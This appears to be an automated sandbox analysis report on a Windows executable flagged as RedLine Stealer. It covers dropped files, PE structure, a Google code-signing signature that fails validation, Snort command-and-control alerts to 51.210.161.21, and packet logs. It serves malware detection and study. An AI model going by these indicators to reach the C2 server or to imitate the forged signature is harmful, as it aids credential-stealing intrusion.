File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.291311032538433
Encrypted:	false
SSDEEP:	12288:ndSvkKwB0p62Hs568SkyCJCEpPBMTODSgdFI9EYzTazmolSNjMn/21SyA1:dSvkKwB0p6Gs565gC98C
MD5:	E4A5F6FC5113EFE9EE95C20DF6032B47
SHA1:	53A574CABE1B6DB9117C50EC7F84C72F9E80C12B
SHA-256:	A9C560E3BF05A1352B9B3250B6433CF50C6235CEB4547EB1325D6FBE3A1F0DAA
SHA-512:	54640A46F23295736A98A7DCE67E6C50F6E3851C2743CEC1055965CD467050CE5A375A9F25B9B364D488B21275745BCBCA85BE21A8C5823182556805BABB8A50
Malicious:	false
Reputation:	unknown
Preview:	regf^...^...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.J[.a^...............................................................................................................................................................................................................................................................................................................................................wRX........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	4.002687923430065
Encrypted:	false
SSDEEP:	768:D4/+6llYA+DDAdxt1Sc8XVgGzwDv8qucPr3B:1oQvY/1uw1
MD5:	0027B7B17D08C7DD2B23EC9887DC99A8
SHA1:	07D1F8CCF8B50712539552E6EAEBA776D4382E74
SHA-256:	A8AC550DD3F52C0E199CE6BF08E720C7A18FDDE2589F0EAEEE14029DB0C72C2B
SHA-512:	33EBB683325B8DD56D91D0E35692E75C1362517DBBE9B1431E3A9189A060690106CE27C73C5667311F2B1F35B164F74EA1B92458AD7B1CD0001E169092DC1719
Malicious:	false
Reputation:	unknown
Preview:	regf]...]...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.J[.a^...............................................................................................................................................................................................................................................................................................................................................wRXHvLE.n......]................`..W.~?Y..y.................@................... ..hbin................p.\..,..........nk,./.].a^.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ./.].a^...... ........................... .......Z.......................Root........lf......Root....nk ./.].a^...................}.............. ...............*...............DeviceCensus........................vk..................WritePermissions

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.44831826838854
Encrypted:	false
SSDEEP:	24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
MD5:	1AEB3A784552CFD2AEDEDC1D43A97A4F
SHA1:	804286AB9F8B3DE053222826A69A7CDA3492411A
SHA-256:	0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
SHA-512:	5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.817543548632908
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1JCAVkYU3U.exe
File size:	1217709
MD5:	719082dcc3c017e5b675c8b9ec74b6a1
SHA1:	d189e585b338d3ce5d6f0c04e0ce94aa40343c6a
SHA256:	6a57409b5f4d0ae13167353c059ddf4b9fe7920647a119a70438dae02a35586e
SHA512:	c72824357f2527917e26dc73d979672299e165b15d3114da66f0fbd4448129cc48487f3079a056af244d5685e847ff9f1e684341c243c7f14572d5ac0626fea5
SSDEEP:	24576:kTbBv5rUlINj1z+EmdKiTazGSfcElXv8zcAsMVMgSZwU:WBREd3GGSfNpAjpS
TLSH:	A4451313FDC158B2D46205320B695B21B97EBC201F75CEEB73D06A5DEA212C0EB357A6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	d49494d6c88ecec2

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/7/2019 4:00:00 PM 11/16/2022 4:00:00 AM
Subject Chain	CN=Google LLC, O=Google LLC, L=Mountain View, S=California, C=US
Version:	3
Thumbprint MD5:	463BFA4FA69A9E6C4D8813CCFAAF16EE
Thumbprint SHA-1:	A3958AE522F3C54B878B20D7B0F63711E08666B2
Thumbprint SHA-256:	5F2F2840C6E51D17F09334ADA05D9DCDD9AEEB11AF0AE163816757D539ABE3EE
Serial:	06AEA76BAC46A9E8CFE6D29E45AAF033

Entrypoint Preview

Instruction
call 00007F2160B05AABh
jmp 00007F2160B053BDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F2160AF8207h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F2160B0884Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F2160B0554Ch
push 0000000Ch
push esi
call 00007F2160B04B09h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F2160AF8182h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F2160B08309h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F2160B054C8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F2160B082ECh
int3
jmp 00007F2160B09D87h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xe050	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x122ee5	0x65c8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x73000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xe050	0xe200	False	0.6343853705752213	data	6.802173495258787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x73000	0x233c	0x2400	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
PNG	0x64644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced
PNG	0x6518c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced
RT_ICON	0x66738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors
RT_ICON	0x66ca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors
RT_ICON	0x67548	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors
RT_ICON	0x683f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m
RT_ICON	0x68858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m
RT_ICON	0x69900	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m
RT_ICON	0x6bea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_DIALOG	0x6fc1c	0x2ba	data
RT_DIALOG	0x6fed8	0x13a	data
RT_DIALOG	0x70014	0xf2	data
RT_DIALOG	0x70108	0x14a	data
RT_DIALOG	0x70254	0x314	data
RT_DIALOG	0x70568	0x24a	data
RT_STRING	0x707b4	0x1fc	data
RT_STRING	0x709b0	0x246	data
RT_STRING	0x70bf8	0x1a6	data
RT_STRING	0x70da0	0xdc	data
RT_STRING	0x70e7c	0x47c	data
RT_STRING	0x712f8	0x164	data
RT_STRING	0x7145c	0x110	data
RT_STRING	0x7156c	0x158	data
RT_STRING	0x716c4	0xe8	data
RT_STRING	0x717ac	0xe6	data
RT_GROUP_ICON	0x71894	0x68	data
RT_MANIFEST	0x718fc	0x753	XML 1.0 document, ASCII text, with CRLF line terminators

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
51.210.161.21192.168.2.636108497202043234 03/24/23-07:58:58.669638	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	36108	49720	51.210.161.21	192.168.2.6
192.168.2.651.210.161.2149720361082043233 03/24/23-07:58:52.952768	TCP	2043233	ET TROJAN RedLine Stealer TCP CnC net.tcp Init	49720	36108	192.168.2.6	51.210.161.21
192.168.2.651.210.161.2149720361082043231 03/24/23-07:59:29.302517	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49720	36108	192.168.2.6	51.210.161.21

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2023 07:58:00.165426016 CET	49710	80	192.168.2.6	208.95.112.1
Mar 24, 2023 07:58:00.197767973 CET	80	49710	208.95.112.1	192.168.2.6
Mar 24, 2023 07:58:00.197938919 CET	49710	80	192.168.2.6	208.95.112.1
Mar 24, 2023 07:58:00.199429035 CET	49710	80	192.168.2.6	208.95.112.1
Mar 24, 2023 07:58:00.233262062 CET	80	49710	208.95.112.1	192.168.2.6
Mar 24, 2023 07:58:00.233344078 CET	49710	80	192.168.2.6	208.95.112.1
Mar 24, 2023 07:58:00.289741039 CET	49711	80	192.168.2.6	84.252.73.140
Mar 24, 2023 07:58:00.352566957 CET	80	49711	84.252.73.140	192.168.2.6
Mar 24, 2023 07:58:00.352693081 CET	49711	80	192.168.2.6	84.252.73.140
Mar 24, 2023 07:58:00.361865044 CET	49711	80	192.168.2.6	84.252.73.140
Mar 24, 2023 07:58:00.422923088 CET	80	49711	84.252.73.140	192.168.2.6
Mar 24, 2023 07:58:00.624924898 CET	80	49711	84.252.73.140	192.168.2.6
Mar 24, 2023 07:58:00.624969959 CET	80	49711	84.252.73.140	192.168.2.6
Mar 24, 2023 07:58:00.625127077 CET	49711	80	192.168.2.6	84.252.73.140
Mar 24, 2023 07:58:00.699309111 CET	49713	80	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:00.722559929 CET	80	49713	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:00.722681046 CET	49713	80	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:00.729454041 CET	49713	80	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:00.752796888 CET	80	49713	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:00.752856016 CET	80	49713	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:00.753026009 CET	49713	80	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:00.791977882 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:00.792074919 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:00.792196035 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:00.835134983 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:00.835180044 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:00.923965931 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:00.924084902 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:01.459867954 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:01.459916115 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:01.460509062 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:01.460597038 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:01.463792086 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:01.463826895 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.174391031 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.174427032 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.174446106 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.174604893 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.174655914 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.174684048 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.174722910 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.174807072 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.197765112 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.197798014 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.197949886 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.197983027 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.198051929 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.199421883 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.199457884 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.199511051 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.199559927 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.199580908 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.199595928 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.199631929 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.199687958 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.220940113 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.220973969 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221117020 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.221151114 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221183062 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.221210003 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.221389055 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221420050 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221508980 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.221522093 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221576929 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.221816063 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221843004 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221910000 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.221921921 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.221947908 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.221968889 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222037077 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222068071 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222107887 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222120047 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222152948 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222172022 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222431898 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222470045 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222553968 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222564936 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222618103 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222671986 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222709894 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222749949 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222763062 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.222793102 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.222834110 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246309042 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246341944 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246422052 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246431112 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246452093 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246457100 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246483088 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246484995 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246519089 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246537924 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246558905 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246587992 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246599913 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246613979 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246634960 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246644020 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246676922 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246704102 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246723890 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246740103 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246748924 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246762037 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246787071 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246803045 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246818066 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246840000 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246866941 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246890068 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246889114 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246906996 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246937990 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.246985912 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.246989012 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247001886 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247030973 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247071981 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247083902 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247113943 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247134924 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247142076 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247165918 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247188091 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247220993 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247234106 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247266054 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247270107 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247298956 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247302055 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247318029 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247342110 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247395992 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247397900 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247414112 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247435093 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247471094 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247510910 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247510910 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247534037 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247587919 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247610092 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247618914 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247634888 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247656107 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247680902 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.247737885 CET	49714	443	192.168.2.6	144.76.136.153
